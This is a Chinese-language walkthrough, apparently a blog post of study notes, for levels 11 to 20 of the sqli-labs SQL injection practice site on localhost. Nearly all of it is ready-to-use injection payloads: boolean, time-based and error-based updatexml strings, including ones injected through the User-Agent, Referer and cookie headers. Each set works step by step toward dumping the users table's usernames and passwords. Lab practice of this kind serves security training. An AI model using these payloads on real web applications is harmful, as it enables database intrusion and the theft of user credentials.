127.0.0.1/sqli/
(注意:有些后面直接附上了答案)
Less 11
1'or 1=1#
求数据库长度(布尔型盲注)
1' or length(database())=8#
求数据库名(xpath)
1'and updatexml(1,concat(0x23,database()),1)#
求表数
1' or (select count(table_name) from information_schema.tables where table_schema='security')=4#
求表名
1'and updatexml(1,concat(0x23,(select group_concat(table_name) from information_schema.tables where table_schema='security')),1)#
求列名
1'and updatexml(1,concat(0x23,(select group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users')),1)#
求字段名
1'and updatexml(1,concat(0x23,(select group_concat(username,0x23,password)from security.users)),1)#
Less 12
xpath做法
1")or 1=1#
1")and updatexml(1,concat(0x23,database()),1)#
1")and updatexml(1,concat(0x23,(select group_concat(table_name) from information_schema.tables where table_schema='security')),1)#
1")and updatexml(1,concat(0x23,(select group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users')),1)#
1")and updatexml(1,concat(0x23,(select group_concat(username,0x23,password)from security.users)),1)#
Less 13
xpath做法
1')or 1=1#
1')and updatexml(1,concat(0x23,database()),1)#
1')and updatexml(1,concat(0x23,(select group_concat(table_name) from information_schema.tables where table_schema='security')),1)#
1')and updatexml(1,concat(0x23,(select group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users')),1)#
1')and updatexml(1,concat(0x23,(select group_concat(username,0x23,password)from security.users)),1)#
Less 14
xpath做法
1"or 1=1#
1"and updatexml(1,concat(0x23,database()),1)#
1"and updatexml(1,concat(0x23,(select group_concat(table_name) from information_schema.tables where table_schema='security')),1)#
1"and updatexml(1,concat(0x23,(select group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users')),1)#
1"and updatexml(1,concat(0x23,(select group_concat(username,0x23,password)from security.users)),1)#
Less 15
时间型盲注
1'or 1=1#
1' or length(database())=8#
1' or if(ascii(substr(database(),1,1))=115,sleep(5),1)#
1' or if(ascii(substr(database(),2,1))=101,sleep(5),1)#
1' or if(ascii(substr(database(),3,1))=99,sleep(5),1)#
1' or if(ascii(substr(database(),4,1))=117,sleep(5),1)#
1' or if(ascii(substr(database(),5,1))=114,sleep(5),1)#
1' or if(ascii(substr(database(),6,1))=105,sleep(5),1)#
1' or if(ascii(substr(database(),7,1))=116,sleep(5),1)#
1' or if(ascii(substr(database(),8,1))=121,sleep(5),1)#
1' or if((select count(table_name) from information_schema.tables where table_schema='security')=4,sleep(5),1)#
Less 16
1")or 1=1#
求数据库长度(时间型盲注)
1")or if(length(database()),sleep(5),1)=8#
求表数
1")or if((select count(table_name) from information_schema.tables where table_schema='security')=4,sleep(5),1)#
Less 17
user name:admin(这里必须输入正确的用户名,否则试不出来)
password:' or 1=1#
求数据库名
1'or updatexml(1,concat(0x23,database()),1)#
求表名
1'or updatexml(1,concat(0x23,(select group_concat(table_name) from information_schema.tables where table_schema='security')),1)# emails,less42,referers,uagents
求列名
1'or updatexml(1,concat(0x23,(select group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users')),1)#
求字段内容
1'or updatexml(1,concat(0x23,(select group_concat(username,0x23,password)from security.users)),1)#
Less 18
先找出 账号和密码
之后用火狐登录后 用burp拦截 之后
爆库名
uagent后面添加:1' or updatexml(1,concat(0x7e,(database())),0) or '
uagent变为:Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:61.0) Gecko/20100101 Firefox/61.01' or updatexml(1,concat(0x7e,(database())),0) or '
爆表名
1' or updatexml(1,concat(0x23,(select group_concat(table_name) from information_schema.tables where table_schema='security')),0) or '
爆列名
1' or updatexml(1,concat(0x23,(select group_concat(column_name) from information_schema.columns where table_schema='security'and table_name='users')),0) or '
报段名
1' or updatexml(1,concat(0x23,(select group_concat(username,0x23,password)from security.users)),0) or '
Less 19
先找出 账号和密码
之后用火狐登录后 用burp拦截 之后
爆库名
referer后面添加:1' or updatexml(1,concat(0x7e,(database())),0) or '
爆表名
1' or updatexml(1,concat(0x23,(select group_concat(table_name) from information_schema.tables where table_schema='security')),0) or '
爆列名
1' or updatexml(1,concat(0x23,(select group_concat(column_name) from information_schema.columns where table_schema='security'and table_name='users')),0) or '
报段名
1' or updatexml(1,concat(0x23,(select group_concat(username,0x23,password)from security.users)),0) or '
Less 20
先找出 账号和密码
之后用火狐登录后 用burp拦截 之后
求列数
za在admin之后填'order by 3%23
邮件刷新之后burp重新拦截
爆库名
1' or updatexml(1,concat(0x7e,(database())),0) or '
爆表名
1' or updatexml(1,concat(0x23,(select group_concat(table_name) from information_schema.tables where table_schema='security')),0) or '
爆列名
1' or updatexml(1,concat(0x23,(select group_concat(column_name) from information_schema.columns where table_schema='security'and table_name='users')),0) or '
报段名
1' or updatexml(1,concat(0x23,(select group_concat(username,0x23,password)from security.users)),0) or '
Less1-10链接https://blog.csdn.net/S123KO/article/details/100048575